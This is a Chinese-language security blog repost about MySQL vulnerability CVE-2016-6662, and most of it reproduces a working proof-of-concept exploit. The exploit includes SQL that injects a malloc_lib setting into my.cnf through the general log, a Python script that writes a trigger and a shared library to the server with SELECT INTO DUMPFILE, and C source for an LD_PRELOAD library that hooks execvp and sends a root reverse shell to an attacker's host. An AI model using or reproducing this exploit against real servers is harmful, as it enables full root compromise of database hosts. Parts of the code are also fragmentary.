
MySQL 0Day漏洞出現 該漏洞可以拿到本地Root權限 綠盟科技釋出防護方案



MySQL 0Day漏洞出現 該漏洞可以拿到本地Root權限 綠盟科技釋出防護方案

mysql版本 <= 5.7.15

mysql版本 <= 5.6.33

mysql版本 <= 5.5.52







<a href="https://www.percona.com/downloads/" target="_blank">https://www.percona.com/downloads/</a>








中期服務:提供 3-6個月的風險監控與巡檢服務。根除風險,確定事件不複發。


攻擊者在僅擁有select/file的權限下,可以利用此漏洞實作root提權 ,執行任意代碼,進而完全控制mysql資料庫和伺服器。



<code># set_malloc_lib lib</code>

<code># - if lib is empty, do nothing and return</code>

<code># - if lib is 'tcmalloc', look for tcmalloc shared library in /usr/lib</code>

<code>#   then pkglibdir.  tcmalloc is part of the google perftools project.</code>

<code># - if lib is an absolute path, assume it is a malloc shared library</code>


<code># put lib in mysqld_ld_preload, which will be added to ld_preload when</code>

<code># running mysqld.  see ld.so for details.</code>

<code>set_malloc_lib() {</code>



<code>if [ "$malloc_lib" = tcmalloc ]; then</code>

<code>pkglibdir=`get_mysql_config --variable=pkglibdir`</code>


<code># this list is kept intentionally simple.  simply set --malloc-lib</code>

<code># to a full path if another location is desired.</code>

<code>for libdir in /usr/lib "$pkglibdir" "$pkglibdir/mysql"; do</code>

<code>for flavor in _minimal '' _and_profiler _debug; do</code>


<code>#log_notice "debug: checking for malloc lib '$tmp'"</code>

<code>[ -r "$tmp" ] || continue</code>


<code>break 2</code>






<code>mysql&gt; set global general_log_file = '/var/lib/mysql/my.cnf';  mysql&gt; set global general_log = on;  mysql&gt; select '  '&gt;  '&gt; ; injected config entry  '&gt;  '&gt; [mysqld]  '&gt; malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so  '&gt;  '&gt; [separator]  '&gt;  '&gt; ';  1 row in set (0.00 sec)  mysql&gt; set global general_log = off;</code>


<code># cat /var/lib/mysql/my.cnf  /usr/sbin/mysqld, version: 5.5.50-0+deb8u1 ((debian)). started with:  tcp port: 3306  unix socket: /var/run/mysqld/mysqld.sock  time                 id command    argument  160728 17:48:22        43 query     select '  ; injected config entry  [mysqld]  malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so  [separator]  '  160728 17:48:23        43 query     set global general_log = off</code>




通過檔案上傳或dumpfile指令将惡意malloc_lib共享庫檔案上傳到目标伺服器 。

<code>// 将二進制共享庫檔案内容轉化為十六進制形式  hookandrootlib_path = './mysql_hookandroot_lib.so'  with open(hookandrootlib_path, 'rb') as f:  content = f.read()  hookandrootlib_hex = binascii.hexlify(content)  // 通過dumpfile指令寫入目前伺服器  select unhex("hookandrootlib_hex") into dumpfile '/var/lib/mysql/mysql_hookandroot_lib.so'</code>

3. 通過設定觸發器,提升使用者權限,為寫入my.cnf檔案做準備。

<code>elimiter //  create definer=`root`@`localhost` trigger appendtoconf  after insert  on `poctable` for each row  begin  declare void varchar(550);  set global general_log_file='/var/lib/mysql/my.cnf';  set global general_log = on;  select "  # 0ldsql_mysql_rce_exploit got here :)  [mysqld]  malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'  [abyss]  " into void;  set global general_log = off;  end; //  delimiter ;</code>

4. 觸發觸發器,使得惡意配置被寫入my.cnf檔案

<code># creating table poctable so that /var/lib/mysql/pocdb/poctable.trg trigger gets loaded by the server  info("creating table 'poctable' so that injected 'poctable.trg' trigger gets loaded")  try:  cursor = dbconn.cursor()  cursor.execute("create table `poctable` (line varchar(600)) engine='myisam'"  )  except mysql.connector.error as err:  errmsg("something went wrong: {}".format(err))  shutdown(6)  # finally, execute the trigger's payload by inserting anything into `poctable`.  # the payload will write to the mysql config file at this point.  try:  cursor = dbconn.cursor()  cursor.execute("insert into `poctable` values('execute the trigger!');" )  except mysql.connector.error as err:  errmsg("something went wrong: {}".format(err))  shutdown(6)</code>

5. 當mysql重新開機時(包括系統更新),就會使得mysqld_safe讀取my.cnf檔案,進而加載執行惡意共享庫檔案,進而執行任意代碼,由于mysqld_safe預設以root權限執行,是以加載執行的共享庫也擁有root權限,可以用來提權。



<code>intro = """</code>

<code>0ldsql_mysql_rce_exploit.py (ver. 1.0)</code>

<code>(cve-2016-6662) mysql remote root code execution / privesc poc exploit</code>

<code>for testing purposes only. do no harm.</code>

<code>discovered/coded by:</code>

<code>dawid golunski</code>



<code>import argparse</code>

<code>import mysql.connector</code>

<code>import binascii</code>

<code>import subprocess</code>

<code>def info(str):</code>

<code>print "[+] " + str + "\n"</code>

<code>def errmsg(str):</code>

<code>print "[!] " + str + "\n"</code>

<code>def shutdown(code):</code>

<code>if (code==0):</code>

<code>info("exiting (code: %d)\n" % code)</code>


<code>errmsg("exiting (code: %d)\n" % code)</code>


<code>cmd = "rm -f /var/lib/mysql/pocdb/poctable.trg ; rm -f /var/lib/mysql/mysql_hookandroot_lib.so"</code>

<code>process = subprocess.popen(cmd, shell=true, stdout=subprocess.pipe, stderr=subprocess.pipe)</code>

<code>(result, error) = process.communicate()</code>

<code>rc = process.wait()</code>

<code># where will the library to be preloaded reside? /tmp might get emptied on reboot</code>

<code># /var/lib/mysql is safer option (and mysql can definitely write in there ;)</code>


<code># main meat</code>

<code>print intro</code>

<code># parse input args</code>

<code>parser = argparse.argumentparser(prog='0ldsql_mysql_rce_exploit.py', description='poc for mysql remote root code execution / privesc cve-2016-6662')</code>

<code>parser.add_argument('-dbuser', dest='target_user', required=true, help='mysql username')</code>

<code>parser.add_argument('-dbpass', dest='target_pass', required=true, help='mysql password')</code>

<code>parser.add_argument('-dbname', dest='target_db',   required=true, help='remote mysql database name')</code>

<code>parser.add_argument('-dbhost', dest='target_host', required=true, help='remote mysql host')</code>

<code>parser.add_argument('-mycnf', dest='target_mycnf', required=true, help='remote my.cnf owned by mysql user')</code>

<code>args = parser.parse_args()</code>

<code># connect to database. provide a user with create table, select and file permissions</code>

<code># create requirement could be bypassed (malicious trigger could be attached to existing tables)</code>

<code>info("connecting to target server %s and target mysql account '%s@%s' using db '%s'" % (args.target_host, args.target_user, args.target_host, args.target_db))</code>


<code>dbconn = mysql.connector.connect(user=args.target_user, password=args.target_pass, database=args.target_db, host=args.target_host)</code>

<code>except mysql.connector.error as err:</code>

<code>errmsg("failed to connect to the target: {}".format(err))</code>


<code>cursor = dbconn.cursor()</code>

<code>cursor.execute("show grants")</code>

<code>errmsg("something went wrong: {}".format(err))</code>


<code>privs = cursor.fetchall()</code>

<code>info("the account in use has the following grants/perms: " )</code>

<code>for priv in privs:</code>

<code>print priv[0]</code>

<code>print ""</code>

<code># compile mysql_hookandroot_lib.so shared library that will eventually hook to the mysqld</code>

<code># process execution and run our code (remote root shell)</code>

<code># remember to match the architecture of the target (not your machine!) otherwise the library</code>

<code># will not load properly on the target.</code>

<code>info("compiling mysql_hookandroot_lib.so")</code>

<code>cmd = "gcc -wall -fpic -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl"</code>

<code>if rc != 0:</code>

<code>errmsg("failed to compile mysql_hookandroot_lib.so: %s" % cmd)</code>

<code>print error</code>

<code># load mysql_hookandroot_lib.so library and encode it into hex</code>

<code>info("converting mysql_hookandroot_lib.so into hex")</code>

<code>hookandrootlib_path = './mysql_hookandroot_lib.so'</code>

<code>with open(hookandrootlib_path, 'rb') as f:</code>

<code>content = f.read()</code>

<code>hookandrootlib_hex = binascii.hexlify(content)</code>

<code># trigger payload that will elevate user privileges and sucessfully execute set global general_log</code>

<code># decoded payload (paths may differ):</code>

<code>delimiter //</code>

<code>create definer=`root`@`localhost` trigger appendtoconf</code>

<code>after insert</code>

<code>on `poctable` for each row</code>


<code>declare void varchar(550);</code>

<code>set global general_log_file='/var/lib/mysql/my.cnf';</code>

<code>set global general_log = on;</code>

<code>select "</code>

<code># 0ldsql_mysql_rce_exploit got here :)</code>




<code>" into void;</code>

<code>set global general_log = off;</code>

<code>end; //</code>

<code>delimiter ;</code>


<code>triggers='create definer=`root`@`localhost` trigger appendtoconf\\nafter insert\\n   on `poctable` for each row\\nbegin\\n\\n   declare void varchar(550);\\n   set global general_log_file=\\'%s\\';\\n   set global general_log = on;\\n   select "\\n\\n# 0ldsql_mysql_rce_exploit got here :)\\n\\n[mysqld]\\nmalloc_lib=\\'%s\\'\\n\\n[abyss]\\n" into void;   \\n   set global general_log = off;\\n\\nend'</code>






<code>""" % (args.target_mycnf, malloc_lib_path)</code>

<code># convert trigger into hex to pass it to unhex() sql function</code>

<code>trigger_payload_hex = "".join("{:02x}".format(ord(c)) for c in trigger_payload)</code>

<code># save trigger into a trigger file</code>

<code>trg_path="/var/lib/mysql/%s/poctable.trg" % args.target_db</code>

<code>info("saving trigger payload into %s" % (trg_path))</code>

<code>cursor.execute("""select unhex("%s") into dumpfile '%s' """ % (trigger_payload_hex, trg_path) )</code>


<code># save library into a trigger file</code>

<code>info("dumping shared library into %s file on the target" % malloc_lib_path)</code>

<code>cursor.execute("""select unhex("%s") into dumpfile '%s' """ % (hookandrootlib_hex, malloc_lib_path) )</code>


<code># creating table poctable so that /var/lib/mysql/pocdb/poctable.trg trigger gets loaded by the server</code>

<code>info("creating table 'poctable' so that injected 'poctable.trg' trigger gets loaded")</code>

<code>cursor.execute("create table `poctable` (line varchar(600)) engine='myisam'"  )</code>


<code># finally, execute the trigger's payload by inserting anything into `poctable`.</code>

<code># the payload will write to the mysql config file at this point.</code>

<code>info("inserting data to `poctable` in order to execute the trigger and write data to the target mysql config %s" % args.target_mycnf )</code>

<code>cursor.execute("insert into `poctable` values('execute the trigger!');" )</code>

<code># check on the config that was just created</code>

<code>info("showing the contents of %s config to verify that our setting (malloc_lib) got injected" % args.target_mycnf )</code>

<code>cursor.execute("select load_file('%s')" % args.target_mycnf)</code>


<code>dbconn.close()  # close db connection</code>

<code>myconfig = cursor.fetchall()</code>

<code>print myconfig[0][0]</code>

<code>info("looks messy? have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :)")</code>

<code># spawn a shell listener using netcat on 6033 (inverted 3306 mysql port so easy to remember ;)</code>

<code>info("everything is set up and ready. spawning netcat listener and waiting for mysql daemon to get restarted to get our rootshell... :)" )</code>

<code>listener = subprocess.popen(args=["/bin/nc", "-lvp","6033"])</code>


<code># show config again after all the action is done</code>

<code>info("shell closed. hope you had fun. ")</code>

<code># mission complete, but just for now... stay tuned :)</code>

<code>info("""stay tuned for the cve-2016-6663 advisory and/or a complete poc that can craft a new valid my.cnf (i.e no writable my.cnf required) ;)""")</code>

<code># shutdown</code>




<code>this is the shared library injected by 0ldsql_mysql_rce_exploit.py exploit.</code>

<code>the library is meant to be loaded by mysqld_safe on mysqld daemon startup</code>

<code>to create a reverse shell that connects back to the attacker's host on</code>

<code>6603 port (mysql port in reverse ;) and provides a root shell on the</code>


<code>mysqld_safe will load this library through the following setting:</code>


<code>in one of the my.cnf config files (e.g. /etc/my.cnf).</code>

<code>this shared library will hook the execvp() function which is called</code>

<code>during the startup of mysqld process.</code>

<code>it will then fork a reverse shell and clean up the poisoned my.cnf</code>

<code>file in order to let mysqld run as normal so that:</code>

<code>'service mysql restart' will work without a problem.</code>

<code>before compiling adjust ip / port and config path.</code>


<code>compilation (remember to choose settings compatible with the remote os/arch):</code>

<code>gcc -wall -fpic -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl</code>


<code>full advisory url:</code>



<code>#define _gnu_source</code>

<code>#include &lt;stdio.h&gt;</code>

<code>#include &lt;sys/types.h&gt;</code>

<code>#include &lt;sys/stat.h&gt;</code>

<code>#include &lt;unistd.h&gt;</code>

<code>#include &lt;string.h&gt;</code>

<code>#include &lt;dlfcn.h&gt;</code>

<code>#include &lt;stdlib.h&gt;</code>

<code>#include &lt;stdarg.h&gt;</code>

<code>#include &lt;fcntl.h&gt;</code>

<code>#include &lt;sys/socket.h&gt;</code>

<code>#include &lt;netinet/in.h&gt;</code>

<code>#include &lt;arpa/inet.h&gt;</code>

<code>#define attackers_ip ""</code>

<code>#define shell_port 6033</code>

<code>#define injected_conf "/var/lib/mysql/my.cnf"</code>

<code>char* env_list[] = { "home=/root", null };</code>

<code>typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]);</code>

<code>static execvp_func_t old_execvp = null;</code>

<code>// fork &amp; send a bash shell to the attacker before starting mysqld</code>

<code>void reverse_shell(void) {</code>

<code>int i; int sockfd;</code>

<code>//socklen_t socklen;</code>

<code>struct sockaddr_in srv_addr;</code>

<code>srv_addr.sin_family = af_inet;</code>

<code>srv_addr.sin_port = htons( shell_port ); // connect-back port</code>

<code>srv_addr.sin_addr.s_addr = inet_addr(attackers_ip); // connect-back ip</code>

<code>// create new tcp socket &amp;&amp; connect</code>

<code>sockfd = socket( af_inet, sock_stream, ipproto_ip );</code>

<code>connect(sockfd, (struct sockaddr *)&amp;srv_addr, sizeof(srv_addr));</code>

<code>for(i = 0; i &lt;= 2; i++) dup2(sockfd, i);</code>

<code>execle( "/bin/bash", "/bin/bash", "-i", null, env_list );</code>




<code>cleanup injected data from the target config before it is read by mysqld</code>

<code>in order to ensure clean startup of the service</code>

<code>the injection (if done via logging) will start with a line like this:</code>

<code>/usr/sbin/mysqld, version: 5.5.50-0+deb8u1 ((debian)). started with:</code>

<code>int config_cleanup() {</code>

<code>file *conf;</code>

<code>char buffer[2000];</code>

<code>long cut_offset=0;</code>

<code>conf = fopen(injected_conf, "r+");</code>

<code>if (!conf) return 1;</code>

<code>while (!feof(conf)) {</code>

<code>fgets(buffer, sizeof(buffer), conf);</code>

<code>if (strstr(buffer,"/usr/sbin/mysqld, version")) {</code>

<code>cut_offset = (ftell(conf) - strlen(buffer));</code>

<code>if (cut_offset&gt;0) ftruncate(fileno(conf), cut_offset);</code>


<code>return 0;</code>

<code>// execvp() hook</code>

<code>int execvp(const char* filename, char* const argv[]) {</code>

<code>pid_t  pid;</code>

<code>int fd;</code>

<code>// simple root poc (touch /root/root_via_mysql)</code>

<code>fd = open("/root/root_via_mysql", o_creat);</code>


<code>old_execvp = dlsym(rtld_next, "execvp");</code>

<code>// fork a reverse shell and execute the original execvp() function</code>

<code>pid = fork();</code>

<code>if (pid == 0)</code>


<code>// clean injected payload before mysqld is started</code>


<code>return old_execvp(filename, argv);</code>



本文由:綠盟科技部落格 釋出,版權歸屬于原作者

